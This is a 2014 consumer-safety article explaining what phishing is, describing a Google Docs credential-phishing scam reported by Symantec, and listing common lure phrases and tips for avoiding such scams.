Phishing for Trouble

 | Thu 24 Apr 2014 15:30 ICT

What is phishing? No, it has nothing to do with jam bands. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. The first acts of phishing were recorded as early as 1995, when hackers tried to steal the passwords and credit card numbers of AOL (America Online) members. In the nearly 20 years since these first acts, hacking and phishing methods have become more sophisticated and, therefore, more dangerous. To avoid becoming a victim, check out the information and tips below.

How to avoid phishing scams

Even though various media sources (newspaper, television, even the internet) comment regularly on the dangers of online thievery and phishing, an alarming amount of “normal” and “well-informed” people fall victim to cyber deceit on a daily basis. Then again, perhaps it’s not that surprising. Phishing scams are used to convince you to share or give up personal information like credit card numbers, bank account information, social security numbers, and passwords. Sometimes these hackers will use this information to steal money but, more often than not, they use the information to steal identities. The easiest way to avoid phishing scams, then, is to never under any circumstances share personal information with unknown sources or online strangers.

How to protect yourself from becoming an (easy) target!

The best ways to protect yourself against phishing are through education and extreme vigilance. Though unfortunate, phishing is a part of modern day life, but not something to which you need to succumb. An important thing to remember is that phishing scams usually happen via e-mail communication or pop-up messages that claim to be legitimate and especially from businesses you might have a relationship with – your credit card company, bank, internet service provider or an online service like PayPal. In these messages you are asked to update or validate your personal information in order to avoid serious consequences to your account. And when you act accordingly to the info in the message, you click the designated button and you are redirected to a website that looks identical to the legitimate one (but, as we know now, isn’t).

And then? Once on the website, you are asked to provide personal information. Don’t! Legitimate businesses will not approach you in this manner. We repeat: legitimate businesses will NOT approach you in this manner. If you have a question after receiving such an e-mail or pop-up message, call the organisation on the telephone and ask if the message was legitimate.

A new and tricky scam!

Researchers at Symantec (an anti-virus and security company) have recently discovered a new phishing scam that is causing massive amounts of online users to forfeit their personal information to hackers, especially those users who frequently use Google applications, such as Google Drive and Google Docs.  

The sophisticated scam targets Google Docs and Google Drive users. The scam sends a message with the simple subject “Documents” and urges the recipient to view an important document on Google Docs by clicking on the included link. The link doesn’t go to Google Docs, but it does go to Google, where a very convincing fake Google Docs login page is displayed.


The fake page is aesthetically convincing because it is hosted on a Google server.  The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive’s preview feature to get a publicly-accessible URL to include in their messages.

This login page will look familiar to many Google users, as it’s used across Google’s services. (The text below, “One account. All of Google.” mentions what service is being accessed, but this is a subtlety that many will not notice.) It’s quite common to be prompted with a login page like this when accessing a Google Docs link, and many people may enter their credentials without a second thought.

After pressing “Sign in,” the user’s credentials are sent to a PHP script on a compromised web server. This page then redirects to a real Google Docs document, making the whole attack very convincing. Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content.

Common phishing come-ons include statements such as:

·         Verify your account…

·         Dear Valued Customer…

·         If you don’t respond within 48 hours, your account will be closed…

·         Click the link below to gain access to your account…

To protect yourself from phishing scams, many supervisory authorities offer the following advice:

·         Never respond to the type of e-mail or pop-ups mentioned above.

·         Keep your virus protection software up-to-date.

·         Don’t send personal or financial information in e-mails. E-mail is insecure.

·         When entering personal information on a website that you initiate a transaction with, make sure the http in the address bar changes to https and the padlock icon appears in your browser window, indicating that the site is secure.

·         Check your credit card statements carefully and report any charges that look suspicious.

·         If you have broadband internet access, consider adding a firewall to protect your computer.

·         Be very cautious when opening any e-mail attachments.

·         Don’t download files you receive via e-mail unless you’re sure they’re coming from someone you trust.